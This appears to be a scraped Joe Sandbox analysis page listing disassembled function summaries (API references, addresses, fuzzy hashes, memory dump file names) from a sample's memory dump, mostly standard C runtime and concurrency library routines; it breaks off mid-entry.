Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 7dc55464e543e95184671fe1986c4ce71a3ebd96e5db1b5dffcb6fcea5f4865f
Instruction ID: a1147a0cdee3e0e4481a665da9478dbf488950bb9d348cc3529a969e7f514293
Opcode Fuzzy Hash: 7dc55464e543e95184671fe1986c4ce71a3ebd96e5db1b5dffcb6fcea5f4865f
Instruction Fuzzy Hash: AB81C272D0822AABDF319E64AC81EFF7BB9EF69318F1C0055E954A7241D625DC40DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D25FF4 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00D26078
__alloca_probe_16.LIBCMT ref: 00D2613E
__freea.LIBCMT ref: 00D261AA

Part of subcall function 00D1C42B: HeapAlloc.KERNEL32(00000000,?,?,?,00D1F8CD,00000220,?,?,?,?,?,?,00D189CE,?), ref: 00D1C45D

__freea.LIBCMT ref: 00D261B3
__freea.LIBCMT ref: 00D261D6

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: e1e5d7784b5a760dbd5dfd59d40862973683c43dfd955eff2dc62f2f0d7713fc
Instruction ID: 8c450e6d1064fa70ee555609d394aaf859d0add7fd3ec42b73204682cb6b0bbd
Opcode Fuzzy Hash: e1e5d7784b5a760dbd5dfd59d40862973683c43dfd955eff2dc62f2f0d7713fc
Instruction Fuzzy Hash: 5951F572510326ABEF265F54FC41EBB3BA9EFA4758F290169FD0497142DB30EC6096B0

Uniqueness

Uniqueness Score: -1.00%

Function 00D18321 Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00D18343
GetFileInformationByHandle.KERNEL32(?,?), ref: 00D1839D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00D18253,?,000000FF), ref: 00D1842B
__dosmaperr.LIBCMT ref: 00D18432
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00D1846F

Part of subcall function 00D18697: __dosmaperr.LIBCMT ref: 00D186CC

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: 0ac40b3beb7239734d620014fe117c0cb74822ce67cde25b01f0bdc885144664
Instruction ID: e344b4c999984db72bd46fc45c10bf0a50d8fd9bce33ee91dafdc4419109cf25
Opcode Fuzzy Hash: 0ac40b3beb7239734d620014fe117c0cb74822ce67cde25b01f0bdc885144664
Instruction Fuzzy Hash: 27413775900745BBDB24DFA5E8459EBBBFAEF88300B14442DE996D2210EF349880EB31

Uniqueness

Uniqueness Score: -1.00%

Function 00D12842 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00D12849
Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00D12894
Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 00D128C7
Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 00D12977

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
String ID:
API String ID: 2092016602-0
Opcode ID: 67e7613f7481e9db6535e19e5059bd43191196d2f896636515e5b9151d51f5b0
Instruction ID: c8551fc77a1d3db7ad26167d5a87fc8fa35eafb93fd9f7fa8a3a4888e0f011a5
Opcode Fuzzy Hash: 67e7613f7481e9db6535e19e5059bd43191196d2f896636515e5b9151d51f5b0
Instruction Fuzzy Hash: E5416175A00705AFCB14DF69D8815EEFBB5FF48310B14822EE419A7780DB75A951CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D0EF80 Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00D0EFB4

Part of subcall function 00D0A37F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00D0A3A0

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00D0F013
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00D0F039
Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 00D0F059
Concurrency::location::_Assign.LIBCMT ref: 00D0F0A6

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerThrowTraceWork
String ID:
API String ID: 1794448563-0
Opcode ID: 82a3e44e955d16c7c0054da1b0303fe19dcadfcc162c52415ae173e5156cd3a8
Instruction ID: 149c45777cec67f9a3ce680fbe1cf5cee7eb1f08834841e7d1898c75a9d66520
Opcode Fuzzy Hash: 82a3e44e955d16c7c0054da1b0303fe19dcadfcc162c52415ae173e5156cd3a8
Instruction Fuzzy Hash: E4410771600214ABCF29AB64C896BBDBB75EF84710F24406DE40A977C2CB749D45CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00D00136 Relevance: 7.6, APIs: 5, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D0013D
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00D00167

Part of subcall function 00D0082D: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00D0084A

__alloca_probe_16.LIBCMT ref: 00D001A3
Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00D001E4
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00D00216

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16
String ID:
API String ID: 2568206803-0
Opcode ID: 80fe3756c625e7965ca0cb814c51cbc34dea7d0f8d49c26c366f40d9353399b5
Instruction ID: 045a89c8a2942c7932dd386f2ffb8f76d18ab536b79f409139ff565ec4b7511a
Opcode Fuzzy Hash: 80fe3756c625e7965ca0cb814c51cbc34dea7d0f8d49c26c366f40d9353399b5
Instruction Fuzzy Hash: AF316F71A002199BCB15DFA8C9417ADBBB5EF09310F294069E509E7391DB349E02CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00D09B19 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 00D09B3E

Part of subcall function 00CFFF20: _SpinWait.LIBCONCRT ref: 00CFFF38

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00D09B52
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00D09B84
List.LIBCMT ref: 00D09C07
List.LIBCMT ref: 00D09C16

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 997ec05777627496de1a6242bb361c9529eca09bf6486ca7290f47939f293839
Instruction ID: cb6039a2a6e165626af717ea8b20800e05b13e14b4642f27c6d5d401063117a0
Opcode Fuzzy Hash: 997ec05777627496de1a6242bb361c9529eca09bf6486ca7290f47939f293839
Instruction Fuzzy Hash: 1C314632901619DBCB14EFA4E5A17EDFBB1FF04324F08016AD84A27292DB71A904CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00D2041A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00D20432

Part of subcall function 00D1C1D5: HeapFree.KERNEL32(00000000,00000000,?,00D204AD,?,00000000,?,?,?,00D204D4,?,00000007,?,?,00D208D6,?), ref: 00D1C1EB
Part of subcall function 00D1C1D5: GetLastError.KERNEL32(?,?,00D204AD,?,00000000,?,?,?,00D204D4,?,00000007,?,?,00D208D6,?,?), ref: 00D1C1FD

_free.LIBCMT ref: 00D20444
_free.LIBCMT ref: 00D20456
_free.LIBCMT ref: 00D20468
_free.LIBCMT ref: 00D2047A

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f42aa920e9db6c5eb7cb31e66b1916dab23ee9805422558d6f6f5311660c0c01
Instruction ID: 710a6489681b017cb6e6ba08916f4cdcf48c3f02d809169765ad22bfc02c3540
Opcode Fuzzy Hash: f42aa920e9db6c5eb7cb31e66b1916dab23ee9805422558d6f6f5311660c0c01
Instruction Fuzzy Hash: AFF062729D4710BB8620FF54F985C5A7BE9EA5132476C9805F508D7A03DB30FCC18670

Uniqueness

Uniqueness Score: -1.00%

Function 00D0C2B5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

List.LIBCONCRT ref: 00D0C33A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D0C35F
Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 00D0C39E

Strings

pExecutionResource, xrefs: 00D0C357

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
String ID: pExecutionResource
API String ID: 1772865662-359481074
Opcode ID: d8b9a168c7d4238957e8fe5358df3570d3631870fa98d7f6adbb0ab80bf016d8
Instruction ID: 923e0e19f4ffcae8074dfb29e132cb6831fa9312c457c0cd6d93e9544977895e
Opcode Fuzzy Hash: d8b9a168c7d4238957e8fe5358df3570d3631870fa98d7f6adbb0ab80bf016d8
Instruction Fuzzy Hash: B821A271A00209AFCB08EF64D842BED77B5BF98700F144019F605AB282DBB4EE449BB5

Uniqueness

Uniqueness Score: -1.00%

Function 00D0B53E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 00D0B552
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 00D0B576
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D0B589

Strings

pScheduler, xrefs: 00D0B581

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: 6c43f9153cbea67ce7f3ffe13d2a325cabde3a6b472069ecd3285dac25c2a07e
Instruction ID: 750a31871cfc1805b45ad0dff8b404ba9d44ef84503583286549917f97caf478
Opcode Fuzzy Hash: 6c43f9153cbea67ce7f3ffe13d2a325cabde3a6b472069ecd3285dac25c2a07e
Instruction Fuzzy Hash: 4BF0E975904604ABC714EB54DC46E9DB379DE90720764416FF51E271C1DB70EE0AC6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00D1DED0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00D1DF57

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: ca2bc9d2d039ccb25d683b845aced4ed922806706006afe168eb201e8fabd620
Instruction ID: 23dc0d2936d2c8215f1206172a27cc12058d88136e022d47e98f4c96b8234a59
Opcode Fuzzy Hash: ca2bc9d2d039ccb25d683b845aced4ed922806706006afe168eb201e8fabd620
Instruction Fuzzy Hash: 15B11632A00295BFDB11CF28E8817EEBBF6EF55350F184169E845DB241DA749E82CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D1649E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00D16565
___AdjustPointer.LIBCMT ref: 00D16588
___AdjustPointer.LIBCMT ref: 00D16624

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 02e67edad89f3af69f8473818594ec4ceead3a651cf4f38bb199c2cc27a09250
Instruction ID: e7e14795f0943ae1f0f3648976d18763784a66622d21de799e77717f8ac93747
Opcode Fuzzy Hash: 02e67edad89f3af69f8473818594ec4ceead3a651cf4f38bb199c2cc27a09250
Instruction Fuzzy Hash: 7451AF72A04216BFEB258F14E941BFA77A6FF10310F184129F90186699EF31E8C1DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00CE8720 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,8C1FD9F5), ref: 00CE8799
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CE8800
GetProcAddress.KERNEL32(00000000), ref: 00CE8807

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: 6d76cd993c9336bdbb759cf3d8c781178dfe8685a405669742505e6964b61008
Instruction ID: 4837547278794dc6329b06febd186719175d256730c841cb05c43ac4eada5f99
Opcode Fuzzy Hash: 6d76cd993c9336bdbb759cf3d8c781178dfe8685a405669742505e6964b61008
Instruction Fuzzy Hash: 43513B70D002489BDB24EF29DD457EDBB75EB45314F904298E819A73D1EF349E88CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00D16065 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 00D160B6
TypeidsEqual.LIBVCRUNTIME ref: 00D160DB
PMDtoOffset.LIBCMT ref: 00D160F1
PMDtoOffset.LIBCMT ref: 00D16172

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction ID: 7a6d71fe4d87d33a08e698af4a349e513d63a5684694fd10449a4d38409527c4
Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction Fuzzy Hash: AB518D35A04309BFDF11CF68E9815EEBBF5EF15354F184459E850A7252DB32EAC88BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CE2DC0 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00CE2E5F
GetCurrentThreadId.KERNEL32 ref: 00CE2E7E
__Mtx_unlock.LIBCPMT ref: 00CE2ECC
__Cnd_broadcast.LIBCPMT ref: 00CE2EE3

Part of subcall function 00CFDAFC: mtx_do_lock.LIBCPMT ref: 00CFDB04

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcastCurrentThreadmtx_do_lock
String ID:
API String ID: 3471820992-0
Opcode ID: 9f62effb67647b7da259eb19edd6306b4905533ba2b33d63b49d6663622a4476
Instruction ID: 09bab3c39bcbeb0ccda8a36e2def133d5a56b000b969416f1b9c3ca56bf0a4a3
Opcode Fuzzy Hash: 9f62effb67647b7da259eb19edd6306b4905533ba2b33d63b49d6663622a4476
Instruction Fuzzy Hash: 444100B1A003599FDB21DFA5C941B6AB7F8FF14311F004529E92AD7780EB34EA04DB82

Uniqueness

Uniqueness Score: -1.00%

Function 00D273AE Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00D2747E
_free.LIBCMT ref: 00D274A7
SetEndOfFile.KERNEL32(00000000,00D22DEA,00000000,00D23081,?,?,?,?,?,?,?,00D22DEA,00D23081,00000000), ref: 00D274D9
GetLastError.KERNEL32(?,?,?,?,?,?,?,00D22DEA,00D23081,00000000,?,?,?,?,00000000), ref: 00D274F5

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 5bb314b563f1f922190efae835e85eb284a45741a70c906ae87ed09806f9ccbb
Instruction ID: b8b043f937bf59cf818f0437e986cb6b2741ed7559245705716b3ec96e21ade2
Opcode Fuzzy Hash: 5bb314b563f1f922190efae835e85eb284a45741a70c906ae87ed09806f9ccbb
Instruction Fuzzy Hash: FD41E872908215ABDB21BBB8FC42BDD7B75EF65324F280510F914E7192DE30C8829B72

Uniqueness

Uniqueness Score: -1.00%

Function 00D0414C Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00D0415F

Memory Dump Source

